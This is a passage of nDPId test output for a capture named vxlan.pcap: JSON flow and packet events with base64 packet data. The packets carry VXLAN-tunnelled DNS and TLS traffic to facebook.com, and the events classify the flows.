+00951{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639650442721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":434,"pkt_l4_len":396,"ts_msec":1639650442721,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQABoANMAABAEcinwKgWBMCoFgXCYhK1AYwCPwgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAFuc1NAAEAGKhUKChQEnfDgI7CqAbtGa9PgzMq\/M4AYAfsRCQAAAQEICvUMMlRu3xNFFgMBATUBAAExAwPcWPn0A3m1eWVQI6wIeeeCbwEERXHekpXL79ewykXCYSB1jrx0W5zbrxLwk6GsjZfhJPYVrgSw3Zq6NCEkFAT06gA+EwITAxMBwCzAMACfzKnMqMyqwCvALwCewCTAKABrwCPAJwBnwArAFAA5wAnAEwAzAJ0AnAA9ADwANQAvAP8BAACqAAAAEQAPAAAMZmFjZWJvb2suY29tAAsABAMAAQIACgAMAAoAHQAXAB4AGQAYACMAAAAWAAAAFwAAAA0AMAAuBAMFAwYDCAcICAgJCAoICwgECAUIBgQBBQEGAQMDAgMDAQIBAwICAgQCBQIGAgArAAkIAwQDAwMCAwEALQACAQEAMwAmACQAHQAgvh2mgzmX9e9ai9f7D2sZdwM6XcPIdlu9U72vXq+2WUY="}
+00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639650442730,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"ts_msec":1639650442730,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAZq8oAABAER4FwKgWBcCoFgTrRhK1AFKtvQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA0NXJAAFcGUiid8OAjCgoUBAG7sKrMyr8zRmvVGoAQAQXWHAAAAQEICm7fE0\/1DDJU"}
+02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639650442731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1500,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1500,"pkt_l4_len":1462,"ts_msec":1639650442731,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAFyq8pAABAERigwKgWBcCoFgTrRhK1BbazIQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAWYNXNAAFcGTMOd8OAjCgoUBAG7sKrMyr8zRmvVGoAQAQV3jwAAAQEICm7fE0\/1DDJUFgMDAHoCAAB2AwOmSfmdNeNm8QDTG24pPSbwgaHpKWVOEuxV0VdDoIbVRCB1jrx0W5zbrxLwk6GsjZfhJPYVrgSw3Zq6NCEkFAT06hMDAAAuACsAAgMEADMAJAAdACBeWCJdN6DYiyNoL9O4psA+bOwF3dlPVj+\/ZvCptenEWhQDAwABARcDAwP5x3wWkfPx0kKF78QldsrrAx9RhC9Bn0NSGlsi9mLXhXMxtjC1tRafSYFhQiJT+Fexnm8My4gs26aQEytaTPmgh5bUcw2QSfIZvydw4\/xZva+hLS\/8KA8IimnKia46hp3fWd34D\/kZeUEi4PChEE1dsSEooXjU12XznCQysKGXu4bNl\/M85AYOBz9YkdnIBAFMjv3LwRfyKzi+n+FzF2x2zQZe5zhiQO++hcg2a8zSiSl8WG4UQlAbxtYUcRtsHiuPhWa\/PFDmcr\/s5mD\/Q55l8WWg9PfvSz5AAtjdU+LwfzbipKrnitGs76ROINneUubu+vg3oG1HDHdCmIEKeQwpdQlOkFMa7Zj9p\/hnuj8kufGBHQWOnvQ4ESu9jqNCVadRhiLORyEnSmIOTVXq2PFZieMvXd\/iPGqx2LJGD35zc9E73bB1G1gUSAjqKKkF7Ka0QSqC60GRLch93kQOqKrg3ohzvWu6Nvcf1bKMMkwp3RH43UImPPvzJfBg0eF8coKNcZUeUHlo354awjbPVkVZdhktOsK2GP0UxCJQkEEIHy30I1R0Mi0YUyrXiupVR5oc885KczFIY6ZLchLSI9gBm4CPo74pczykPl0D2ohno9XIYd917oz\/CK6iDlxcZRoVCD9vR\/QBAVfogV5k0Bxag8nU0KkVlVrZu05e7Ga+la++aA\/ZRES1+kbfTcNkz+8wG0huQcFD9TuPucbrdbya+Lt4QerqgS6VIW4NcTKUEe7ooQN3x+GdEnHT5nA80FCh2Q8\/7Y4VrtbkIgXx1EFWygd\/V2e6bsr0FcvNp9dOQi4BilNsmBAYks4O62pQ+ID1+NsWsODEwCDgqelXXYi5V9R4vP0erUMDezq+wfpJUYzqIfZioJ\/y5HkwdUPno9YJNeESiKCDdm0vSVcq2riB8OcvQGo\/oDBJBq6nucF6sN73xA4p3ylMscy6Qt06wCWiIr6\/vtUxxidwqOW8p2ZSSzkMx7XwpulVjUmRTrg1+pvDcBMZhTG9kIWHEUpGufrn4DQ51+oLui2RUzj5RrrnkZPvUcP3Uuf14vSYq\/g7J4\/eWdbdU2KCbHvT9wEZhi+VqOcKwG4DrRCujjzD3M4n08F6YOy6Scb4ZllcNjr65M66+QJXPHl\/qHrvVforxHgyi32Tp\/UN7ndgWwvzaAOqXr7WczqRiqyo11sYjhK2i91KB3fKsvsBdhbBQICqoKnWoaqw5eT9wfklQ0THh3G6DwjYbN8EYkzO576Kr2zwXFUqs4v+YkPVQY1z03PbCmgHbLckVMef7zjCijTbA\/yVRubOrENRdj4UBJxaoYP5sU895ipoXgXM1lSoqdOIJN4We+WBWsDjj7BpFwMDBe2TZHfrkB8f5TtDXM+TM0HPoRHXGJ7oGDZRZy0uPUx3IAPv3pCX9H0HbaU\/LA95w76hakUfhlXm7Vn78btBVP3OOeAsZ62gfgCXMiiM0NNLeJLiobbCc5AckKUS9M9XcUF9gQ2jgSpnpqdmyjX9LeO5ci7XrBg6Kuj9ATfiiYj8xXQOq0KONbnADXTjSNP+mRm+X4ZdGhZQhoUs7+r9y6T3L6QaFdpvuhamDG3Y+2lgP0Oygwz31QjrgZ3kiDdVFWXvn4FweXAGyXb4\/RH2YOzcZO6qBDJPMp+Xq7rr"}
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":180000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639650442864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":130,"pkt_l4_len":92,"ts_msec":1639650442864,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAcANpAABAEcm6wKgWBMCoFgXrvxK1AFxsGAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA+NbtAAEAR1tYKChQECAgICIBcADUAKoq80C4BAAABAAAAAAAAA3d3dwhmYWNlYm9vawNjb20AAAEAAQ=="}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":180000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639650442864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":130,"pkt_l4_len":92,"ts_msec":1639650442864,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAcANqAABAEcm5wKgWBMCoFgXrvxK1AFxsGAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA+NbxAAEAR1tUKChQECAgICIBcADUAKi+aKzYBAAABAAAAAAAAA3d3dwhmYWNlYm9vawNjb20AABwAAQ=="}
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639650442902,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":175,"pkt_l4_len":137,"ts_msec":1639650442902,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAna9MAABAER2qwKgWBcCoFgTESxK1AImt9AgAAAAABFcAHuppKm\/PZnpQqv+aCABFCABrklQAAHgRgggICAgICgoUBAA1gFwAV2EE0C6BgAABAAIAAAAAA3d3dwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAClEAEQlzdGFyLW1pbmkEYzEwcsAQwC4AAQABAAAAEQAEnfDgIw=="}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639650442930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":187,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":187,"pkt_l4_len":149,"ts_msec":1639650442930,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAqa9SAABAER2YwKgWBcCoFgTESxK1AJWuAAgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAB3WtIAAHgRuX4ICAgICgoUBAA1gFwAY6QKKzaBgAABAAIAAAAAA3d3dwhmYWNlYm9vawNjb20AABwAAcAMAAUAAQAACnkAEQlzdGFyLW1pbmkEYzEwcsAQwC4AHAABAAAAPAAQKgMogPFlAIH6zrAMAAAl3g=="}
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639650442931,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"ts_msec":1639650442931,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbgNuAABAEcm3wKgWBMCoFgWexhK1AFonDQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA8KWlAAEAGdTEKChQEnfDgI7CsAbtx7JCPAAAAAKAC\/VzRnAAAAgQFggQCCAr1DDMmAAAAAAEDAwc="}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1639650442941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"ts_msec":1639650442941,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAbq9VAABAER3QwKgWBcCoFgSNvhK1AFqtxQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA8AABAAFcGh5Kd8OAjCgoUBAG7sKwSxDYyceyQkKAS\/\/\/6FgAAAgQFcAQCCAo3WVST9QwzJgEDAwg="}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":180000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639650442941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"ts_msec":1639650442941,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAZgNwAABAEcm9wKgWBMCoFgWexhK1AFInFQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA0KWpAAEAGdTgKChQEnfDgI7CsAbtx7JCQEsQ2M4AQAfsmmgAAAQEICvUMMzE3WVST"}
+00957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1639650442942,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":438,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":438,"pkt_l4_len":400,"ts_msec":1639650442942,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQABpANxAABAEch+wKgWBMCoFgWexhK1AZAl1wgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAFyKWtAAEAGc\/kKChQEnfDgI7CsAbtx7JCQEsQ2M4AYAfsFYwAAAQEICvUMMzE3WVSTFgMBATkBAAE1AwM+kikCjZKYLJ0yMsC2SkPOGgwTwgkXQ4SgJHcmBMuaciDzcy2bbZtRNimKWfvjKRYfjG8z06\/JyuimMrKvKOQk2AA+EwITAxMBwCzAMACfzKnMqMyqwCvALwCewCTAKABrwCPAJwBnwArAFAA5wAnAEwAzAJ0AnAA9ADwANQAvAP8BAACuAAAAFQATAAAQd3d3LmZhY2Vib29rLmNvbQALAAQDAAECAAoADAAKAB0AFwAeABkAGAAjAAAAFgAAABcAAAANADAALgQDBQMGAwgHCAgICQgKCAsIBAgFCAYEAQUBBgEDAwIDAwECAQMCAgIEAgUCBgIAKwAJCAMEAwMDAgMBAC0AAgEBADMAJgAkAB0AIFjRzvsXuQ0A5A179GyLQXzYsfihHOpNhs3mPbXqyp9j"}
+00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1639650442952,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"ts_msec":1639650442952,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAZq9YAABAER3VwKgWBcCoFgSNvhK1AFKtvQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA0iYtAAFcG\/g6d8OAjCgoUBAG7sKwSxDYzceyRzoAQAQUmRwAAAQEICjdZVJ71DDMx"}
+02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1639650442953,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1500,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1500,"pkt_l4_len":1462,"ts_msec":1639650442953,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAFyq9ZAABAERhwwKgWBcCoFgSNvhK1BbazIQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAWYiYxAAFcG+Kmd8OAjCgoUBAG7sKwSxDYzceyRzoAQAQUwxgAAAQEICjdZVJ\/1DDMxFgMDAHoCAAB2AwOCxvI5EXHPK47hHjBvMw\/BI06Lkop9Q1UWqJnwHHEN3CDzcy2bbZtRNimKWfvjKRYfjG8z06\/JyuimMrKvKOQk2BMDAAAuACsAAgMEADMAJAAdACDAmDgjswZAHJO96Fxo5TF\/yHycPaDsaAssE+9YRtxuEBQDAwABARcDAwP5a5IZfVeyKEpOW0ufVGHnS60wv8jhNGuVFX1zlQlbDVGUUfZZGketBg2YthNR92n\/MnYwVxVhLF8luCNg98YcDHmLLzoHZsL49nDI+l9FD1r3wmiZMWL0y3yQZ\/JJQKcjOwcRiF5wjYIImRQjdfRPMVOpZX\/eVRUbhOETdoAwwjdl+orOFnHqlPn5W8zlz4vJR9+aKEMgg4VpLfA7gJ9BUce3E1AaydUD+XJnWAEIHLgcGKblAISRpe7EvwEoeN3STwz5TvBkeELGXhsRX3VYe06CV9GB9VUiMOxvkOe31kzQb1w5L8Q9dutguKq4auDiRIQdo3UPxjULEUEc8daV3AVkJf2C1IybYidwRoHGi86ATrnZfFObldSoDiKx4JXrwos9QDOQpTdBNWZYx1lo\/uqq\/8g1iPHfxsw1J8SNoIu5azXqXHRnZtnkXa0yFNP8rYYC0HNJXH5qFNBZ2p1fwoVg6AJX9XpDhAf\/k3osd3p+iDepC3IlVLkm+GmIka\/ZxprUZwNv+NGPRXYwQEVExWeySi4zMfz+B08WmlYQlxDWeXWgy2Izp8brlY84iY7t+GG4wm4JGr4A5KEWS58eKrUQrvPFR3jjXo6\/NCMu1YlygA+8c1qXjV+4IWGGMZkGFl87oSHi5P5ls+PzEck+yxjmOkP2mvhzrgr8cdbPj8RHsmNL+PETzQCtb1+I3PsP7AAQBnvJY2h7WghCBHgXKcXI9Fb91uYXjT0slYvTKjLrM+DmeFlzGURSW\/vAfQS1WzWshi0ZK\/8PHNQOsgSP5kX6vbKm1\/h4vdrSdq9Xy+3ChNYwY3Nz9UiRkomRmJoIRcqg8BPD4F7Li3UV4xy3ABlESzoqS14VkfVrJvF8Mssxb9uvKQB+Qftsw2prI4ct04qYspIUp+UyM6Y\/2OJhQWUzJBR7uDTVCn7cANa1qv5E81wp3WQIDI4BILWzecMZ++5JNOCdB5nQhfnz\/N46Rxh2m7dGQVsrhILqQg18vZWRXgsaYlpdWLllg3Cc33BYO\/+xQSxE5dvD+kHOSyP82e6eYHseshW7ln2FQDBjhnpBmuu8bKe+ZLkLevp6JoX4n7CIT23dcVV70UPfHzh3IBD9V+aD+PezeVtAGtuN4sZFohCJqTCjU\/XDcbZBeh6OfGZnUa850szjVLwzCcjXUP5B2l9n8SVTcXC3TF1cNpmTKwK01\/iJodz\/Q1ONsNdD4Jx8jY\/TLAlz4SJ+p7EPwFCMcwgZZKDl7ngwm0oPKncBrp0h2I0LOu793MxLBZwWgaM2KE3RBP2Qczs4SWP11UNQru+qxNl5EQLpinZejHt4hIt43rCVfRdXm2XDWme1jb1NB\/BYjxMUFwMDBe2NF\/B6RhuN92VOyJI6GV0+4MNlaQ2zRuSi41Qbfxms7nL+4fbQoszMAls3NvQOy8nluFZhTsFed4rEOfffnONOkD7LtY9K1a3OfMAvUkl3q6LpSyD0SRfScUpqPrYnKJKjotSjbJI1H3Jju7kYZHpZmKplW8uHRWRib1NTXyMtmkspyf4o9O8JqQuaFjRmqaxCy5szM8p4uCMgWJOsDWJwQOAiq9lsGYapphKG4xh87apARlJDtwJp7Pqq0l3QKmlxxFqvbS6YLtQFb\/KsIDWmRMf\/M0ylaAuf8pwk"}
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
+00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1639650443097,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOIAABAEcmxwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YTAAAAAFAEAABE2gAA"}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650443097,"flow_last_seen":1639650443097,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1639650443097,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1639650443097,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOJAABAEcmwwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YTAAAAAFAEAABE2gAA"}
+00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1639650443097,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":108,"pkt_l4_len":70,"ts_msec":1639650443097,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAWgOKAABAEcmvwKgWBMCoFgXrRhK1AEbaoAgAAAAABFcAZnpQqv+aHuppKm\/PCABFCAAoAABAAEAGnqYKChQEnfDgI7CqAbtGa9YUAAAAAFAEAABE2QAA"}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":180000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1639650442902,"flow_last_seen":1639650442930,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1639650442941,"flow_last_seen":1639650443276,"flow_idle_time":180000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":1454,"flow_tot_l4_payload_len":68647,"flow_avg_l4_payload_len":1225,"midstream":0,"ts_msec":1639650443276,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}}
